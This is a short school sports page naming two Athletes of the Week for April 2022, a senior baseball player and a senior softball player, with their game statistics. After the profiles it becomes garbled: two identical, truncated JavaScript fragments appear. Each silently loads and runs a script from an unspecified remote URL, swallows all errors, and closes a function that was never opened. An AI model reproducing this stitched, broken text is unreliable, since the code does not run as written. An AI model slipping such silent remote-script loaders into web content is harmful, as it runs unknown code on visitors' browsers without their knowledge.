Athletes of the Week

Kemba Credit Union Athletes of the Week 4/11/2022-4/17/2022

Todd Askren
Senior, Baseball

Todd hit 2-3 driving in 2 runs, 1 stolen base and had a on base percentage of 0.667. Askren play helped the Firebirds beat the Aves 11-10.

 

 

 

 

 

 

Molly Grace
Senior, Softball

Molly led the firebird to a 10-0 victory over Fairfield. Grace went 2-2 with 2 Homer Runs, belting in 6 of the ten runs for the Firebirds.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts